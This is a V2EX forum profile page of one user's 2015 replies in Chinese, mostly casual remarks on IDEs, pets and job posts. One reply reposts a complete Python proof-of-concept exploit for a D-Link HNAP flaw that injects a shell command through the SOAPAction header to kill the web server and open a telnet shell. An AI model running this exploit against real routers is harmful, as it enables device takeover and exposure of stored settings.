V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  Karblue  ›  全部回复第 11 页 / 共 12 页
回复总数  221
1 ... 3  4  5  6  7  8  9  10  11  12  
2015-06-06 14:26:45 +08:00
回复了 n37r06u3 创建的主题 分享创造 pythoncave 代码直播
卧槽我都是在斗鱼看lol,神tm居然有直播写代码的,涨姿势了
2015-06-04 23:45:55 +08:00
回复了 akaayy 创建的主题 宠物 北京有没有租借宠物的服务啊
好好给她说。如果养了就坚持。租借对狗狗也太不公平了
虽然会JAVA,可惜是主做C#/PYTHON 的 ,帮顶
2015-06-04 13:12:45 +08:00
回复了 bruce55 创建的主题 Python 用过 PTVS 嘛?个人感觉还满强的
@bruce55 笔记本不能同时装机械和固态表示蛋疼呀
2015-06-04 12:02:28 +08:00
回复了 bruce55 创建的主题 Python 用过 PTVS 嘛?个人感觉还满强的
@bruce55 ssd 给笔记本用太浪费了。垃圾本。开个vs 起码10秒 ,
2015-06-04 10:04:11 +08:00
回复了 bruce55 创建的主题 Python 用过 PTVS 嘛?个人感觉还满强的
虽然vs很强大.但是启动很慢.pycharm也是, 但是用简洁一点的 智能提示和调试功能都不怎么好,目前现在在用 wingide~ vs纯用来写c# /c++
2015-06-04 09:48:10 +08:00
回复了 gkiwi 创建的主题 酷工作 [北京朝阳 python]只能帮到你们这里了>15K
不错呀.可惜不在帝都~ 至于PHP为什么不写python,大概是因为是宇宙第一语言的关系(雾
2015-06-03 14:39:32 +08:00
回复了 davidyin 创建的主题 分享发现 各大无线路由器品牌暴漏洞
还发现了devttsy0的吐槽。吐槽Dlink的补丁。看了一下神tm补丁打的真是捉急
http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/
2015-06-03 14:32:04 +08:00
回复了 davidyin 创建的主题 分享发现 各大无线路由器品牌暴漏洞
#!/usr/bin/env python

import sys
import urllib2
import httplib

try:
ip_port = sys.argv[1].split(':')
ip = ip_port[0]

if len(ip_port) == 2:
port = ip_port[1]
elif len(ip_port) == 1:
port = "80"
else:
raise IndexError
except IndexError:
print "Usage: %s <target ip:port>" % sys.argv[0]
sys.exit(1)

url = "http://%s:%s/HNAP1" % (ip, port)
# NOTE: If exploiting from the LAN, telnetd can be started on
# any port; killing the http server and re-using its port
# is not necessary.
#
# Killing off all hung hnap processes ensures that we can
# re-start httpd later.
command = "killall httpd; killall hnap; telnetd -p %s" % port
headers = {
"SOAPAction" : '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % command,
}

req = urllib2.Request(url, None, headers)
try:
urllib2.urlopen(req)
raise Exception("Unexpected response")
except httplib.BadStatusLine:
print "Exploit sent, try telnetting to %s:%s!" % (ip, port)
print "To dump all system settings, run (no quotes): 'xmldbc -d /var/config.xml; cat /var/config.xml'"
sys.exit(0)
except Exception:
print "Received an unexpected response from the server; exploit probably failed. :("



POC在此。从devttsy0大神po来的
2015-06-03 14:27:12 +08:00
回复了 davidyin 创建的主题 分享发现 各大无线路由器品牌暴漏洞
不是只影响Dlink么。国内厂商好像没有躺枪吧
2015-06-03 11:27:04 +08:00
回复了 wowpanda 创建的主题 Python 请教关于 python 简单的 socket 服务器端的问题
epoll & iocp 同步操作肯定效率低
B 罩杯的胸肌什么鬼! 我觉得说拥有强森的胸肌更好不是么
2015-06-01 17:44:53 +08:00
回复了 tgfbeta 创建的主题 程序员 现在上必应,也中卫士么?
要么ISP问题要么链路劫持,
1 ... 3  4  5  6  7  8  9  10  11  12  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3862 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 32ms · UTC 04:18 · PVG 12:18 · LAX 21:18 · JFK 00:18
Developed with CodeLauncher
♥ Do have faith in what you're doing.